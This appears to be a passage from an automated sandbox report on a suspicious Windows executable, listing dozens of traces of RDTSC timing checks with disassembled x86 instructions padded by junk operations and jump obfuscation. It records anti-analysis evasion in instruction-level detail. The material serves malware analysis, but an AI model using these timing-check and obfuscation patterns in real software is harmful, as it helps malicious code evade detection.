Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5883 second address: 5F5896 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007F6E64DC24C4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5896 second address: 5F589A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F589A second address: 5F58CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 pushad 0x00000008 mov dword ptr [ebp+122D1BE4h], edx 0x0000000e sub dword ptr [ebp+122D335Fh], ecx 0x00000014 popad 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+122D2F38h], ecx 0x0000001d mov edx, 2209ADE5h 0x00000022 push 0F8A28B4h 0x00000027 jl 00007F6E64DC24C0h 0x0000002d push eax 0x0000002e push edx 0x0000002f push ebx 0x00000030 pop ebx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F58CB second address: 5F596C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 0F8A2834h 0x0000000d mov edx, 5E8FB8F3h 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F6E644F7528h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov esi, dword ptr [ebp+122D2A63h] 0x00000034 mov esi, dword ptr [ebp+122D2F51h] 0x0000003a push 00000000h 0x0000003c stc 0x0000003d push 00000003h 0x0000003f call 00007F6E644F752Ch 0x00000044 mov di, dx 0x00000047 pop ecx 0x00000048 jmp 00007F6E644F7532h 0x0000004d push D3AA6C5Bh 0x00000052 jbe 00007F6E644F752Eh 0x00000058 xor dword ptr [esp], 13AA6C5Bh 0x0000005f or dword ptr [ebp+122D24F4h], eax 0x00000065 lea ebx, dword ptr [ebp+124555B2h] 0x0000006b sub dword ptr [ebp+122D3838h], edi 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 jns 00007F6E644F7528h 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F596C second address: 5F5971 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5AFB second address: 5F5AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5AFF second address: 5F5B09 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF0C7 second address: 5DF105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6E644F7535h 0x0000000b ja 00007F6E644F7526h 0x00000011 popad 0x00000012 push edx 0x00000013 jne 00007F6E644F7526h 0x00000019 pop edx 0x0000001a pop ecx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F6E644F7530h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DF105 second address: 5DF11D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E64DC24B6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F6E64DC24B8h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615714 second address: 61571A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6158A8 second address: 6158C0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F6E64DC24B6h 0x00000012 jp 00007F6E64DC24B6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6158C0 second address: 6158CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E644F7526h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615A20 second address: 615A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615D82 second address: 615D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615D87 second address: 615DBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007F6E64DC24C1h 0x0000000c popad 0x0000000d jmp 00007F6E64DC24C2h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jo 00007F6E64DC24E1h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615DBE second address: 615DE1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E644F7526h 0x00000008 jmp 00007F6E644F7531h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F6E644F752Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615F37 second address: 615F3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615F3B second address: 615F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6E644F7537h 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 615F60 second address: 615F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6160D0 second address: 6160D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6160D4 second address: 6160EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E64DC24C0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6162B2 second address: 6162B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6167F5 second address: 616824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6E64DC24C8h 0x00000011 jmp 00007F6E64DC24BBh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61696A second address: 616970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616970 second address: 616995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F6E64DC24C9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616995 second address: 61699F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6E644F7526h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60DB54 second address: 60DB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60DB58 second address: 60DB72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7536h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60DB72 second address: 60DB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B07 second address: 616B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007F6E644F752Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B1D second address: 616B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B23 second address: 616B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B29 second address: 616B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6170BD second address: 6170D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F752Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6170D2 second address: 6170D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6170D6 second address: 6170E0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6E644F7526h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6170E0 second address: 6170E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6173C4 second address: 6173C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6173C8 second address: 6173D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6173D5 second address: 6173DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6173DD second address: 6173E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61751D second address: 617529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6E644F7526h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 617529 second address: 617533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 617533 second address: 61759D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jng 00007F6E644F7526h 0x00000016 jmp 00007F6E644F7538h 0x0000001b popad 0x0000001c jl 00007F6E644F7546h 0x00000022 jmp 00007F6E644F7533h 0x00000027 jmp 00007F6E644F752Dh 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f jnc 00007F6E644F7528h 0x00000035 jl 00007F6E644F752Ah 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d push ebx 0x0000003e pop ebx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60DB26 second address: 60DB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60DB2F second address: 60DB54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6E644F7537h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E8AC second address: 61E8BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E8BF second address: 61E8C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E8C4 second address: 61E8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007F6E64DC24BEh 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E8D5 second address: 61E8E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E8E4 second address: 61E8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F6E64DC24BCh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E8FE second address: 61E916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F6E644F7526h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61D90D second address: 61D911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E77F9 second address: 5E7803 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E644F7526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623AFA second address: 623B04 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623B04 second address: 623B20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F6E644F7526h 0x00000009 je 00007F6E644F7526h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007F6E644F7526h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623DA3 second address: 623DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623EA7 second address: 623EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6245F9 second address: 6245FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6246EB second address: 6246F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6246F0 second address: 6246FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6E64DC24BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624992 second address: 624998 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6250EC second address: 6250F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62593A second address: 62593E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62624B second address: 62624F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6270D1 second address: 6270D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627AFF second address: 627B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627E09 second address: 627E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6270D7 second address: 6270DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627B05 second address: 627B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 628913 second address: 628949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov esi, dword ptr [ebp+122D27EBh] 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D28FBh] 0x00000018 push 00000000h 0x0000001a or si, 8900h 0x0000001f mov esi, dword ptr [ebp+122D18C5h] 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6290D8 second address: 6290DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6290DD second address: 6290FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F6E64DC24B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jp 00007F6E64DC24C2h 0x00000015 js 00007F6E64DC24BCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DA126 second address: 5DA143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F7539h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DA143 second address: 5DA14D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DA14D second address: 5DA151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62E5F0 second address: 62E658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D2557h], edx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F6E64DC24B8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov bl, dh 0x0000002d movsx edi, si 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F6E64DC24B8h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c adc ebx, 00CD023Ch 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pop edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F540 second address: 62F545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F545 second address: 62F555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A6DD second address: 62A6E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F555 second address: 62F55B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A6E1 second address: 62A6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F6E644F7526h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A6EF second address: 62A705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F6E64DC24BCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6337FA second address: 633805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F66C second address: 62F715 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D3240h], eax 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F6E64DC24B8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov ebx, dword ptr [ebp+122D2987h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push eax 0x00000042 call 00007F6E64DC24B8h 0x00000047 pop eax 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c add dword ptr [esp+04h], 00000014h 0x00000054 inc eax 0x00000055 push eax 0x00000056 ret 0x00000057 pop eax 0x00000058 ret 0x00000059 mov ebx, dword ptr [ebp+122D57B3h] 0x0000005f mov eax, dword ptr [ebp+122D0B5Dh] 0x00000065 mov bx, 3634h 0x00000069 push FFFFFFFFh 0x0000006b or bx, 93FEh 0x00000070 nop 0x00000071 jg 00007F6E64DC24C5h 0x00000077 push ecx 0x00000078 jmp 00007F6E64DC24BDh 0x0000007d pop ecx 0x0000007e push eax 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 jmp 00007F6E64DC24C3h 0x00000087 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6307A1 second address: 6307B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7532h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F715 second address: 62F73F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6E64DC24BEh 0x00000010 rdtsc
